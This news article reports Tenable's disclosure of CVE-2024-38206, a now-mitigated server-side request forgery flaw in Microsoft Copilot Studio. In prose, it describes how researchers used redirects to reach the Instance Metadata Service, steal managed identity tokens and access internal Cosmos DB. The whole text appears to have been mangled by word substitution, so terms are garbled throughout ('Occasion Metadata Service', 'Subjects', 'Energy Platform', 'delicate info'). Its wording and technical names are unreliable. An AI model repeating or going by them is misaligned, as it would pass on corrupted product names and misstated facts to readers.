Researchers have exploited a vulnerability in Microsoft’s Copilot Studio device permitting them to make exterior HTTP requests that may entry delicate info relating to inner companies inside a cloud setting — with potential affect throughout a number of tenants.
Tenable researchers found the server-side request forgery (SSRF) flaw within the chatbot creation device, which they exploited to entry Microsoft’s inner infrastructure, together with the Occasion Metadata Service (IMDS) and inner Cosmos DB cases, they revealed in a weblog submit this week.
Tracked by Microsoft as CVE-2024-38206, the flaw permits an authenticated attacker to bypass SSRF safety in Microsoft Copilot Studio to leak delicate cloud-based info over a community, in keeping with a safety advisory related to the vulnerability. The flaw exists when combining an HTTP request that may be created utilizing the device with an SSRF safety bypass, in keeping with Tenable.
“An SSRF vulnerability happens when an attacker is ready to affect the applying into making server-side HTTP requests to surprising targets or in an surprising means,” Tenable safety researcher Evan Grant defined within the submit.
The researchers examined their exploit to create HTTP requests to entry cloud knowledge and companies from a number of tenants. They found that “whereas no cross-tenant info appeared instantly accessible, the infrastructure used for this Copilot Studio service was shared amongst tenants,” Grant wrote.
Any affect on that infrastructure, then, may have an effect on a number of prospects, he defined. “Whereas we do not know the extent of the affect that having learn/write entry to this infrastructure may have, it is clear that as a result of it is shared amongst tenants, the chance is magnified,” Grant wrote. The researchers additionally discovered that they may use their exploit to entry different inner hosts unrestricted on the native subnet to which their occasion belonged.
Microsoft responded shortly to Tenable’s notification of the flaw, and it has since been absolutely mitigated, with no motion required on the a part of Copilot Studio customers, the corporate mentioned in its safety advisory.
How the CVE-2024-38206 Vulnerability Works
Microsoft launched Copilot Studio late final 12 months as a drag-and-drop, easy-to-use device to create customized synthetic intelligence (AI) assistants, often known as chatbots. These conversational functions enable folks to carry out a wide range of giant language mannequin (LLM) and generative AI duties leveraging knowledge ingested from the Microsoft 365 setting, or another knowledge that the Energy Platform on which the device is constructed.
Copilot Studio’s preliminary launch lately was flagged as usually “means overpermissioned” by safety researcher Michael Bargury at this 12 months’s Black Hat convention in Las Vegas; he discovered 15 safety points with the device that may enable for the creation of flawed chatbots.
The Tenable researchers found the device’s SSRF flaw once they had been trying into SSRF vulnerabilities within the APIs for Microsoft’s Azure AI Studio and Azure ML Studio, which the corporate itself flagged and patched earlier than the researchers may report them. The researchers then turned their investigative consideration to Copilot Studio to see if it additionally may very well be exploited in an analogous means.
Exploiting HTTP Requests to Acquire Cloud Entry
When creating a brand new Copilot, folks can outline Subjects, which permit them to specify key phrases {that a} person can say to the Copilot to elicit a particular response or motion by the AI; one of many actions that may be carried out through Subjects is an HTTP request. Certainly, most trendy apps that take care of knowledge evaluation or machine studying have the potential to make these requests, as a result of their must combine knowledge from exterior companies; the draw back is that it might probably create a possible vulnerability, Grant famous.
The researchers tried requesting entry to numerous cloud assets in addition to leveraging widespread SSRF safety bypass methods utilizing HTTP requests. Whereas many requests yielded System Error responses, ultimately the researchers pointed their request at a server they managed and despatched a 301 redirect response that pointed to the restricted hosts that they had beforehand tried to request. And ultimately via trial and error, and by combining redirects and SSRF bypasses, the researchers managed to retrieve managed identification entry tokens from the IMDS to make use of to entry inner cloud assets, corresponding to Azure companies and a Cosmos DB occasion. In addition they exploited the flaw to realize learn/write entry to the database.
Although the analysis proved inconclusive in regards to the extent that the flaw may very well be exploited to realize entry to delicate cloud knowledge, it was severe sufficient to immediate speedy mitigation. Certainly, the existence of the SSRF flaw ought to be a cautionary story for customers of Copilot Studio of the potential for attackers to abuse its HTTP-request characteristic to raise their entry to cloud knowledge and assets.
“If an attacker is ready to management the goal of these requests, they may level the request to a delicate inner useful resource for which the server-side utility has entry even when the attacker does not,” Grant warned, “revealing probably delicate info.”